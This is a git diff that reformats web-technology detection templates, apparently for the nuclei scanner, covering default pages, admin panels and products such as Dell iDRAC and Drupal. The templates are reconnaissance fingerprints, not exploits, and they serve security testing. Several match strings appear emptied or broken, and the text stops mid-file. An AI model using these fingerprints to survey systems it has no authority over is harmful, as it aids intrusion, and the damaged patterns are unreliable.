48d8dca8b2..c91c86ff3f 100644 --- a/http/technologies/dash-panel-detect.yaml +++ b/http/technologies/dash-panel-detect.yaml @@ -5,8 +5,8 @@ info: author: tess severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"DashRenderer" tags: tech,dash @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/technologies/dedecms-detect.yaml b/http/technologies/dedecms-detect.yaml index 4ef411ffc7..8b6d03c644 100644 --- a/http/technologies/dedecms-detect.yaml +++ b/http/technologies/dedecms-detect.yaml @@ -5,9 +5,9 @@ info: author: ritikchaddha,pphuahua severity: info metadata: + verified: true max-request: 2 shodan-query: title:"dedecms" || http.html:"power by dedecms" - verified: true tags: dedecms,tech http: @@ -18,6 +18,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: dsl diff --git a/http/technologies/default-amazon-cognito.yaml b/http/technologies/default-amazon-cognito.yaml index 82f6705bc9..56194d3d5b 100644 --- a/http/technologies/default-amazon-cognito.yaml +++ b/http/technologies/default-amazon-cognito.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Amazon Cognito Developer Authentication Sample" - tags: aws,cognito,default,tech,cognito + tags: aws,cognito,default,tech http: - method: GET diff --git a/http/technologies/default-apache-miracle.yaml b/http/technologies/default-apache-miracle.yaml index a2073a479d..d195f6be85 100644 --- a/http/technologies/default-apache-miracle.yaml +++ b/http/technologies/default-apache-miracle.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Apache Miracle Linux Web Server" tags: tech,default-page,apache,miracle @@ -24,4 +24,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/technologies/default-apache-shiro.yaml b/http/technologies/default-apache-shiro.yaml index 4cf9e82622..ce3bc43a4f 100644 --- a/http/technologies/default-apache-shiro.yaml +++ b/http/technologies/default-apache-shiro.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Apache Shiro Quickstart" tags: tech,apache,shiro diff --git a/http/technologies/default-cakephp-page.yaml b/http/technologies/default-cakephp-page.yaml index 63274ec179..89d33aaf16 100644 --- a/http/technologies/default-cakephp-page.yaml +++ b/http/technologies/default-cakephp-page.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Welcome to CakePHP" tags: tech,cakephp,default-page diff --git a/http/technologies/default-detect-generic.yaml b/http/technologies/default-detect-generic.yaml index d37dcb0f71..e04754a171 100644 --- a/http/technologies/default-detect-generic.yaml +++ b/http/technologies/default-detect-generic.yaml @@ -5,9 +5,9 @@ info: author: andydoering severity: info description: Catch-all for detecting default installations of web applications using common phrases found in default install pages - tags: tech metadata: max-request: 1 + tags: tech http: - method: GET @@ -15,10 +15,9 @@ http: - "{{BaseURL}}" matchers: - - type: word part: body condition: or words: - "Default" - - "Welcome to" \ No newline at end of file + - "Welcome to" diff --git a/http/technologies/default-jetty-page.yaml b/http/technologies/default-jetty-page.yaml index b34fc9de3a..f9d84e429b 100644 --- a/http/technologies/default-jetty-page.yaml +++ b/http/technologies/default-jetty-page.yaml @@ -13,6 +13,7 @@ http: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: diff --git a/http/technologies/default-lighttpd-page.yaml b/http/technologies/default-lighttpd-page.yaml index de82e51338..a9ccf62e29 100644 --- a/http/technologies/default-lighttpd-page.yaml +++ b/http/technologies/default-lighttpd-page.yaml @@ -19,6 +19,7 @@ http: - type: word words: - "Powered by lighttpd" + - type: status status: - 200 diff --git a/http/technologies/default-lucee-page.yaml b/http/technologies/default-lucee-page.yaml index f02ab80540..6efc0dcc44 100644 --- a/http/technologies/default-lucee-page.yaml +++ b/http/technologies/default-lucee-page.yaml @@ -19,6 +19,7 @@ http: words: - "Rapid web development with Lucee!" part: body + extractors: - type: regex part: body diff --git a/http/technologies/default-movable-page.yaml b/http/technologies/default-movable-page.yaml index b20e697d43..19cb44e28a 100644 --- a/http/technologies/default-movable-page.yaml +++ b/http/technologies/default-movable-page.yaml @@ -13,6 +13,7 @@ http: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: diff --git a/http/technologies/default-page-azure-container.yaml b/http/technologies/default-page-azure-container.yaml index 884d64c1fa..9319187a0e 100644 --- a/http/technologies/default-page-azure-container.yaml +++ b/http/technologies/default-page-azure-container.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Welcome to Azure Container Instances!" tags: tech,azure,cloud diff --git a/http/technologies/default-parallels-plesk.yaml b/http/technologies/default-parallels-plesk.yaml index 3b67e817df..5666e902d2 100644 --- a/http/technologies/default-parallels-plesk.yaml +++ b/http/technologies/default-parallels-plesk.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Default Parallels Plesk Panel Page" tags: tech,default-page,parallels,plesk diff --git a/http/technologies/default-runcloud-page.yaml b/http/technologies/default-runcloud-page.yaml index 2481185f3c..f6af5ae901 100644 --- a/http/technologies/default-runcloud-page.yaml +++ b/http/technologies/default-runcloud-page.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Welcome To RunCloud" tags: tech,runcloud,default-page diff --git a/http/technologies/default-sitecore-page.yaml b/http/technologies/default-sitecore-page.yaml index 72d99a89f0..1cbe5d92d2 100644 --- a/http/technologies/default-sitecore-page.yaml +++ b/http/technologies/default-sitecore-page.yaml @@ -9,8 +9,8 @@ info: reference: | https://www.sitecore.com/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Welcome to Sitecore" tags: tech,sitecore,cms diff --git a/http/technologies/default-symfony-page.yaml b/http/technologies/default-symfony-page.yaml index 78beb0f79d..3127ffdae5 100644 --- a/http/technologies/default-symfony-page.yaml +++ b/http/technologies/default-symfony-page.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Welcome to Symfony" tags: tech,symfony,default-page @@ -33,4 +33,4 @@ http: part: body group: 1 regex: - - "([0-9.]+)" \ No newline at end of file + - "([0-9.]+)" diff --git a/http/technologies/default-tengine-page.yaml b/http/technologies/default-tengine-page.yaml index 67fefb5938..d1f52e24e3 100644 --- a/http/technologies/default-tengine-page.yaml +++ b/http/technologies/default-tengine-page.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Welcome to tengine" tags: tech,tengine,default-page @@ -26,4 +26,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/technologies/default-websphere-liberty.yaml b/http/technologies/default-websphere-liberty.yaml index 69ae6fd2a6..b9145adb5a 100644 --- a/http/technologies/default-websphere-liberty.yaml +++ b/http/technologies/default-websphere-liberty.yaml @@ -5,8 +5,8 @@ info: author: oppsec severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"WebSphere Liberty" tags: tech,websphere,liberty diff --git a/http/technologies/dell/dell-idrac6-detect.yaml b/http/technologies/dell/dell-idrac6-detect.yaml index 9ccf2dde7e..3dbb19b1cb 100644 --- a/http/technologies/dell/dell-idrac6-detect.yaml +++ b/http/technologies/dell/dell-idrac6-detect.yaml @@ -5,9 +5,9 @@ info: author: kophjager007 severity: info description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. - tags: tech,dell metadata: max-request: 1 + tags: tech,dell http: - method: GET @@ -19,6 +19,7 @@ http: - type: status status: - 200 + - type: word part: body words: diff --git a/http/technologies/dell/dell-idrac7-detect.yaml b/http/technologies/dell/dell-idrac7-detect.yaml index 913383a6eb..47d14500ea 100644 --- a/http/technologies/dell/dell-idrac7-detect.yaml +++ b/http/technologies/dell/dell-idrac7-detect.yaml @@ -5,9 +5,9 @@ info: author: kophjager007 severity: info description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. - tags: tech,dell metadata: max-request: 1 + tags: tech,dell http: - method: GET @@ -19,6 +19,7 @@ http: - type: status status: - 200 + - type: word part: body words: diff --git a/http/technologies/dell/dell-idrac8-detect.yaml b/http/technologies/dell/dell-idrac8-detect.yaml index 1f24431abc..8b7d1756a9 100644 --- a/http/technologies/dell/dell-idrac8-detect.yaml +++ b/http/technologies/dell/dell-idrac8-detect.yaml @@ -5,9 +5,9 @@ info: author: kophjager007 severity: info description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. - tags: tech,dell metadata: max-request: 1 + tags: tech,dell http: - method: GET @@ -19,6 +19,7 @@ http: - type: status status: - 200 + - type: word part: body words: diff --git a/http/technologies/dell/dell-idrac9-detect.yaml b/http/technologies/dell/dell-idrac9-detect.yaml index c920814a42..46997d382a 100644 --- a/http/technologies/dell/dell-idrac9-detect.yaml +++ b/http/technologies/dell/dell-idrac9-detect.yaml @@ -5,14 +5,14 @@ info: author: kophjager007 severity: info description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. - tags: tech,dell metadata: max-request: 1 + tags: tech,dell http: - method: GET path: - - "{{BaseURL}}/sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9) + - "{{BaseURL}}/sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9) matchers-condition: and matchers: diff --git a/http/technologies/detect-sentry.yaml b/http/technologies/detect-sentry.yaml index d727cd6414..bd85155f0a 100644 --- a/http/technologies/detect-sentry.yaml +++ b/http/technologies/detect-sentry.yaml @@ -7,9 +7,9 @@ info: reference: - https://hackerone.com/reports/374737 - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en - tags: ssrf,sentry,tech,hackerone metadata: max-request: 1 + tags: ssrf,sentry,tech,hackerone http: - method: GET diff --git a/http/technologies/devexpress-detect.yaml b/http/technologies/devexpress-detect.yaml index 8f5455b16e..f9e004be84 100644 --- a/http/technologies/devexpress-detect.yaml +++ b/http/technologies/devexpress-detect.yaml @@ -20,4 +20,4 @@ http: - type: word part: body words: - - "DXR.axd" \ No newline at end of file + - "DXR.axd" diff --git a/http/technologies/dreambox-detect.yaml b/http/technologies/dreambox-detect.yaml index 3f10648590..2459f3336d 100644 --- a/http/technologies/dreambox-detect.yaml +++ b/http/technologies/dreambox-detect.yaml @@ -4,9 +4,9 @@ info: name: DreamBox Detect author: pikpikcu severity: info - tags: dreambox,tech metadata: max-request: 1 + tags: dreambox,tech http: - method: GET diff --git a/http/technologies/drupal-detect.yaml b/http/technologies/drupal-detect.yaml index 63c27706f6..ab46fa6a9c 100644 --- a/http/technologies/drupal-detect.yaml +++ b/http/technologies/drupal-detect.yaml @@ -5,8 +5,8 @@ info: author: 1nf1n7y severity: info metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.component:"Drupal" tags: tech,drupal @@ -37,4 +37,4 @@ http: name: version_by_install group: 1 regex: - - 'class="site-version">([0-9.x-]+)' \ No newline at end of file + - 'class="site-version">([0-9.x-]+)' diff --git a/http/technologies/dwr-index-detect.yaml b/http/technologies/dwr-index-detect.yaml index e33f1cae00..3ed4d83fd7 100644 --- a/http/technologies/dwr-index-detect.yaml +++ b/http/technologies/dwr-index-detect.yaml @@ -4,8 +4,7 @@ info: name: DWR detect test page detection author: pussycat0x severity: low - description: The index contains the list of exposed Java classes. From here one can navigate to the test page of each class where every callable method is described and can be easily tested. This is a great way - to find out what methods are exposed and learn how they function. + description: The index contains the list of exposed Java classes. From here one can navigate to the test page of each class where every callable method is described and can be easily tested. This is a great way to find out what methods are exposed and learn how they function. reference: - http://aetherlab.net/2012/09/experiences-in-pentesting-dwr/ metadata: diff --git a/http/technologies/ecology-detect.yaml b/http/technologies/ecology-detect.yaml index 252deac7ac..72cb386f58 100644 --- a/http/technologies/ecology-detect.yaml +++ b/http/technologies/ecology-detect.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" tags: ecology,tech diff --git a/http/technologies/eg-manager-detect.yaml b/http/technologies/eg-manager-detect.yaml index a29c2e43b9..2de3b9be01 100644 --- a/http/technologies/eg-manager-detect.yaml +++ b/http/technologies/eg-manager-detect.yaml @@ -4,9 +4,9 @@ info: name: eG Manager Detect author: pikpikcu severity: info - tags: tech,eg metadata: max-request: 1 + tags: tech,eg http: - method: GET @@ -15,7 +15,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/technologies/elfinder-detect.yaml b/http/technologies/elfinder-detect.yaml index 73aaeb51db..ec41d90d9c 100644 --- a/http/technologies/elfinder-detect.yaml +++ b/http/technologies/elfinder-detect.yaml @@ -3,15 +3,15 @@ id: elfinder-detect info: name: elFinder - Install Detection author: pikpikcu - description: An elFinder implementation was discovered. severity: info + description: An elFinder implementation was discovered. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: tech,elfinder metadata: max-request: 2 + tags: tech,elfinder http: - method: GET @@ -20,9 +20,9 @@ http: - "{{BaseURL}}/elfinder.html" stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/technologies/elfinder-version.yaml b/http/technologies/elfinder-version.yaml index 398a721634..09a3e959a0 100644 --- a/http/technologies/elfinder-version.yaml +++ b/http/technologies/elfinder-version.yaml @@ -10,11 +10,11 @@ info: - https://github.com/Studio-42/elFinder/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: tech,elfinder,oss metadata: max-request: 2 + tags: tech,elfinder,oss http: - method: GET diff --git a/http/technologies/emqx-detect.yaml b/http/technologies/emqx-detect.yaml index 7bca427b0d..5e33a8e64c 100644 --- a/http/technologies/emqx-detect.yaml +++ b/http/technologies/emqx-detect.yaml @@ -4,9 +4,9 @@ info: name: Emqx Detection author: For3stCo1d severity: info - tags: tech,emqx metadata: max-request: 1 + tags: tech,emqx http: - method: GET diff --git a/http/technologies/erigon-server-detect.yaml b/http/technologies/erigon-server-detect.yaml index d8b604a538..b79e4fd02a 100644 --- a/http/technologies/erigon-server-detect.yaml +++ b/http/technologies/erigon-server-detect.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/ledgerwatch/erigon metadata: + verified: true max-request: 1 shodan-query: product:"Erigon" - verified: true tags: tech,erigon,ethereum,web3,blockchain http: diff --git a/http/technologies/express-default-page.yaml b/http/technologies/express-default-page.yaml index 9cbd9ffb17..9a20ca0f2c 100644 --- a/http/technologies/express-default-page.yaml +++ b/http/technologies/express-default-page.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Welcome to Express" tags: tech,express diff --git a/http/technologies/eyesofnetwork-detect.yaml b/http/technologies/eyesofnetwork-detect.yaml index b6fd4e0ef0..4bfb797e62 100644 --- a/http/technologies/eyesofnetwork-detect.yaml +++ b/http/technologies/eyesofnetwork-detect.yaml @@ -7,9 +7,9 @@ info: description: EyesOfNetwork detection reference: - https://www.eyesofnetwork.com/en - tags: tech,cisa,eyesofnetwork metadata: max-request: 1 + tags: tech,cisa,eyesofnetwork http: - method: GET diff --git a/http/technologies/fanruanoa-detect.yaml b/http/technologies/fanruanoa-detect.yaml index 9809ddb661..b5d94617a4 100644 --- a/http/technologies/fanruanoa-detect.yaml +++ b/http/technologies/fanruanoa-detect.yaml @@ -4,23 +4,24 @@ info: name: FanRuanOA-detect author: YanYun severity: info - tags: oa,tech,dotnet,fanruan metadata: max-request: 2 + tags: oa,tech,dotnet,fanruan http: - method: GET - path: - "{{BaseURL}}/WebReport/ReportServer" - "{{BaseURL}}/ReportServer" stop-at-first-match: true + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - 'DeploySuccess._init' \ No newline at end of file + - 'DeploySuccess._init' diff --git a/http/technologies/fanruanoa2012-detect.yaml b/http/technologies/fanruanoa2012-detect.yaml index 1723d4cb68..a1c858fdc5 100644 --- a/http/technologies/fanruanoa2012-detect.yaml +++ b/http/technologies/fanruanoa2012-detect.yaml @@ -4,9 +4,9 @@ info: name: FanRuanOA2012-detect author: YanYun severity: info - tags: oa,java,fanruan,tech metadata: max-request: 1 + tags: oa,java,fanruan,tech http: - method: GET @@ -18,6 +18,7 @@ http: - type: status status: - 200 + - type: word words: - - 'down.download?FM_SYS_ID' \ No newline at end of file + - 'down.download?FM_SYS_ID' diff --git a/http/technologies/fastjson-version.yaml b/http/technologies/fastjson-version.yaml index 46b6821820..b78cb9572b 100644 --- a/http/technologies/fastjson-version.yaml +++ b/http/technologies/fastjson-version.yaml @@ -7,9 +7,9 @@ info: description: If the server returns an exception to the client,The fastjson version will be retrieved,Fastjson versions greater than 1.2.41,Contains the latest version(1.2.76). reference: - https://blog.csdn.net/caiqiiqi/article/details/107907489 - tags: fastjson,tech metadata: max-request: 1 + tags: fastjson,tech http: - raw: @@ -30,4 +30,4 @@ http: part: body group: 1 regex: - - 'fastjson-version.*([0-9]\.[0-9]+\.[0-9]+)' \ No newline at end of file + - 'fastjson-version.*([0-9]\.[0-9]+\.[0-9]+)' diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 29a7e03165..7753a04919 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -27,7 +27,6 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 - matchers: - type: dsl name: proxmox diff --git a/http/technologies/fingerprinthub-web-fingerprints.yaml b/http/technologies/fingerprinthub-web-fingerprints.yaml index d2c5098ffb..a1c60b374a 100755 --- a/http/technologies/fingerprinthub-web-fingerprints.yaml +++ b/http/technologies/fingerprinthub-web-fingerprints.yaml @@ -9,9 +9,9 @@ info: - https://github.com/0x727/FingerprintHub classification: cwe-id: CWE-200 - tags: tech metadata: max-request: 1 + tags: tech http: - method: GET @@ -1796,8 +1796,7 @@ http: - type: word name: cerberus-helpdesk words: - - + - - type: word name: symantec-endpoint-protection-manager words: - - symantec endpoint - protection manager
web access
+ - symantec endpoint protection manager
web access
- type: word name: symantec-thawte_ssl_cert @@ -12099,8 +12064,7 @@ http: - type: word name: synology-webstation words: - - id="paragraph">web station has been enabled. to finish setting up your website, - please see the "web service + - id="paragraph">web station has been enabled. to finish setting up your website, please see the "web service - type: word name: tab-and-link-manager @@ -12222,8 +12186,7 @@ http: - type: word name: telenor-4g-router words: - - please power off and plug in (u)sim card. then power on again. or pin is permanently - blocked, please contact the provider + - please power off and plug in (u)sim card. then power on again. or pin is permanently blocked, please contact the provider - type: word name: teleradiology-telrads @@ -12789,8 +12752,7 @@ http: - type: word name: turbo-seek words: - - var myspecs = "'menubar=0,status=1,resizable=1,location=0,titlebar=1,toolbar=1,scrollbars=1,width=" - + mywidth + ",height=" + myheight + + - var myspecs = "'menubar=0,status=1,resizable=1,location=0,titlebar=1,toolbar=1,scrollbars=1,width=" + mywidth + ",height=" + myheight + - type: word name: turbomail @@ -12968,8 +12930,7 @@ http: - type: word name: ultrastats words: - - + - - type: word name: uniform-server @@ -12984,8 +12945,7 @@ http: - type: word name: uniform-server words: - -
+ - - type: word name: unimas-cameraaudit @@ -13037,14 +12997,12 @@ http: - type: word name: useresponse words: - -
+ - title="customer feedback software, community support system" target="_blank" href="http://www.useresponse.com" class="popup-logo"> - type: word name: useso @@ -13136,8 +13094,7 @@ http: - type: word name: vbulletin words: - - powered by < a href="https://www.vbulletin.com" - id="vbulletinlink"> + - powered by < a href="https://www.vbulletin.com" id="vbulletinlink"> - type: word name: vcalendar @@ -13626,8 +13583,7 @@ http: - type: word name: web-data-administrator words: - - shopping cart software' + - 'powered by webasyst shop-script shopping cart software' - type: word name: webbased-pear-package-manager @@ -13718,8 +13673,7 @@ http: - type: word name: webissues words: - -
+ -
- type: word name: weblogic @@ -13860,14 +13814,12 @@ http: - type: word name: whatweb words: - -
+ -
troy - serial server
- type: word name: whatweb words: - - network card access password: + - network card access password: - type: word name: whfst-cms @@ -13907,8 +13859,7 @@ http: - type: word name: whmcs words: - -
please login - or register
+ -
please login or register
- type: word name: whtzjkj-erp @@ -14408,8 +14359,7 @@ http: - type: word name: yelala words: - - '' + - '' - type: word name: yfidea-oa @@ -14684,8 +14634,7 @@ http: - type: word name: yunanbao-yunxz words: - - 'id=mtokenplugin width=0 height=0 style="position: absolute;left: 0px; top: - 0px"' + - 'id=mtokenplugin width=0 height=0 style="position: absolute;left: 0px; top: 0px"' - type: word name: yuneasy-ipcalling @@ -14990,8 +14939,7 @@ http: - type: word name: zkteco-security-management-system words: - - $(".copyright").text("copyright ? " + server_current_year + " zkteco co., ltd. - all rights reserved"); + - $(".copyright").text("copyright ? " + server_current_year + " zkteco co., ltd. all rights reserved"); - type: word name: zkteco-system @@ -15069,8 +15017,7 @@ http: - type: word name: zxoa words: - - name="button1" value="" onclick="javascript:return checkfrom();" id="button1" - class="loginbtn" /> + - name="button1" value="" onclick="javascript:return checkfrom();" id="button1" class="loginbtn" /> - type: word name: zzcms diff --git a/http/technologies/froxlor-detect.yaml b/http/technologies/froxlor-detect.yaml index 7e76d80b04..bf6deadbf2 100644 --- a/http/technologies/froxlor-detect.yaml +++ b/http/technologies/froxlor-detect.yaml @@ -4,9 +4,9 @@ info: name: Froxlor Detect author: pikpikcu severity: info - tags: tech,froxlor metadata: max-request: 1 + tags: tech,froxlor http: - method: GET @@ -15,7 +15,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/technologies/geo-webserver-detect.yaml b/http/technologies/geo-webserver-detect.yaml index 647a10016b..e4375fc7f4 100644 --- a/http/technologies/geo-webserver-detect.yaml +++ b/http/technologies/geo-webserver-detect.yaml @@ -7,11 +7,11 @@ info: description: GeoWebServer Detector panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"GeoWebServer" tags: panel,geowebserver,tech diff --git a/http/technologies/geth-server-detect.yaml b/http/technologies/geth-server-detect.yaml index f51dc65232..a2ec604a8b 100644 --- a/http/technologies/geth-server-detect.yaml +++ b/http/technologies/geth-server-detect.yaml @@ -5,14 +5,14 @@ info: author: Nullfuzz severity: info description: | - Go-ethereum (aka Geth) is an Ethereum client built in Go. Geth runs a JSON-RPC HTTP server on port 8545/TCP + Go-ethereum (aka Geth) is an Ethereum client built in Go. Geth runs a JSON-RPC HTTP server on port 8545/TCP reference: - https://geth.ethereum.org/docs - https://github.com/ethereum/go-ethereum metadata: + verified: true max-request: 1 shodan-query: product:"Geth" - verified: true tags: tech,geth,ethereum,web3,blockchain http: diff --git a/http/technologies/getsimple-cms-detect.yaml b/http/technologies/getsimple-cms-detect.yaml index 1b3247ffc7..a8e9f0dffd 100644 --- a/http/technologies/getsimple-cms-detect.yaml +++ b/http/technologies/getsimple-cms-detect.yaml @@ -5,9 +5,9 @@ info: author: pikpikcu,philippedelteil severity: info description: Template to detect a running GetSimple CMS instance - tags: tech,getsimple metadata: max-request: 2 + tags: tech,getsimple http: - method: GET @@ -16,6 +16,7 @@ http: - "{{BaseURL}}/readme.txt" stop-at-first-match: true + matchers-condition: and matchers: - type: status @@ -27,4 +28,4 @@ http: - "Powered by GetSimple" - 'GetSimple CMS is a flatfile CMS' part: body - condition: or \ No newline at end of file + condition: or diff --git a/http/technologies/gilacms-detect.yaml b/http/technologies/gilacms-detect.yaml index e7a946b17d..89875eafa7 100644 --- a/http/technologies/gilacms-detect.yaml +++ b/http/technologies/gilacms-detect.yaml @@ -4,9 +4,9 @@ info: name: GilaCMS Detect author: pikpikcu severity: info - tags: tech,gilacms metadata: max-request: 2 + tags: tech,gilacms http: - method: GET @@ -15,6 +15,7 @@ http: - "{{BaseURL}}/user" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/technologies/gitbook-detect.yaml b/http/technologies/gitbook-detect.yaml index 26a98cfd59..4d22b50faf 100644 --- a/http/technologies/gitbook-detect.yaml +++ b/http/technologies/gitbook-detect.yaml @@ -7,8 +7,8 @@ info: description: GitBook is a collaborative documentation tool that allows anyone to document anything—such as products and APIs—and share knowledge through a user-friendly online platform. reference: https://www.gitbook.com/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"gitbook" fofa: app="Introduction-GitBook" tags: tech,gitbook diff --git a/http/technologies/gitea-detect.yaml b/http/technologies/gitea-detect.yaml index cdd7a8f5ca..079c72d5c6 100644 --- a/http/technologies/gitea-detect.yaml +++ b/http/technologies/gitea-detect.yaml @@ -4,9 +4,9 @@ info: name: Gitea Detect author: pikpikcu severity: info - tags: tech,gitea metadata: max-request: 2 + tags: tech,gitea http: - method: GET @@ -15,9 +15,9 @@ http: - "{{BaseURL}}/user/login" stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/technologies/glpi-status-page.yaml b/http/technologies/glpi-status-page.yaml index c5d565d785..4f8ad9c480 100644 --- a/http/technologies/glpi-status-page.yaml +++ b/http/technologies/glpi-status-page.yaml @@ -9,8 +9,8 @@ info: reference: - https://buildmedia.readthedocs.org/media/pdf/glpi-user-documentation/latest/glpi-user-documentation.pdf metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"glpi" tags: tech,status,glpi diff --git a/http/technologies/gnuboard-detect.yaml b/http/technologies/gnuboard-detect.yaml index 5da78ac0da..c227d85fab 100644 --- a/http/technologies/gnuboard-detect.yaml +++ b/http/technologies/gnuboard-detect.yaml @@ -9,11 +9,11 @@ info: - https://sir.kr/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: tech,gnuboard metadata: max-request: 1 + tags: tech,gnuboard http: - method: GET diff --git a/http/technologies/goliath-detect.yaml b/http/technologies/goliath-detect.yaml index a6311fcb94..ae9b0773f7 100644 --- a/http/technologies/goliath-detect.yaml +++ b/http/technologies/goliath-detect.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/postrank-labs/goliath metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: 'Server: Goliath' tags: tech,goliath diff --git a/http/technologies/google-frontend-httpserver.yaml b/http/technologies/google-frontend-httpserver.yaml index ad15eea0c2..3468d82bae 100644 --- a/http/technologies/google-frontend-httpserver.yaml +++ b/http/technologies/google-frontend-httpserver.yaml @@ -5,8 +5,8 @@ info: author: pikpikcu severity: info metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: "Server: Google Frontend" tags: tech,google,httpserver diff --git a/http/technologies/google/cloud-run-default-page.yaml b/http/technologies/google/cloud-run-default-page.yaml index 683a6a001b..8286fc1c68 100644 --- a/http/technologies/google/cloud-run-default-page.yaml +++ b/http/technologies/google/cloud-run-default-page.yaml @@ -7,8 +7,8 @@ info: reference: - https://cloud.google.com/run/docs/overview/what-is-cloud-run metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Congratulations | Cloud Run" tags: tech,cloudrun,google diff --git a/http/technologies/google/firebase-detect.yaml b/http/technologies/google/firebase-detect.yaml index 514cb9dd50..58cc7cba42 100644 --- a/http/technologies/google/firebase-detect.yaml +++ b/http/technologies/google/firebase-detect.yaml @@ -6,9 +6,9 @@ info: severity: low reference: - http://ghostlulz.com/google-exposed-firebase-database/ - tags: tech,firebase metadata: max-request: 1 + tags: tech,firebase http: - method: GET diff --git a/http/technologies/google/firebase-urls.yaml b/http/technologies/google/firebase-urls.yaml index ba7e7da275..67484c34a8 100644 --- a/http/technologies/google/firebase-urls.yaml +++ b/http/technologies/google/firebase-urls.yaml @@ -5,9 +5,9 @@ info: author: panch0r3d severity: info description: Find firebaseio urls to check for security permissions - tags: tech,firebase,google metadata: max-request: 1 + tags: tech,firebase,google http: - method: GET diff --git a/http/technologies/google/google-bucket-service.yaml b/http/technologies/google/google-bucket-service.yaml index cf0faf9a26..a2f00870fa 100644 --- a/http/technologies/google/google-bucket-service.yaml +++ b/http/technologies/google/google-bucket-service.yaml @@ -4,9 +4,9 @@ info: name: Detect websites using Google bucket storage author: pdteam severity: info - tags: google,tech,bucket metadata: max-request: 1 + tags: google,tech,bucket http: - method: GET diff --git a/http/technologies/google/google-storage.yaml b/http/technologies/google/google-storage.yaml index 8cd4444dad..566dd83c1f 100644 --- a/http/technologies/google/google-storage.yaml +++ b/http/technologies/google/google-storage.yaml @@ -4,14 +4,15 @@ info: name: Google Bucket detection author: 0xTeles severity: info - tags: tech,gstorage,google,bucket metadata: max-request: 1 + tags: tech,gstorage,google,bucket http: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: diff --git a/http/technologies/graphiql-detect.yaml b/http/technologies/graphiql-detect.yaml index fce9194825..f665204ea3 100644 --- a/http/technologies/graphiql-detect.yaml +++ b/http/technologies/graphiql-detect.yaml @@ -5,9 +5,9 @@ info: author: 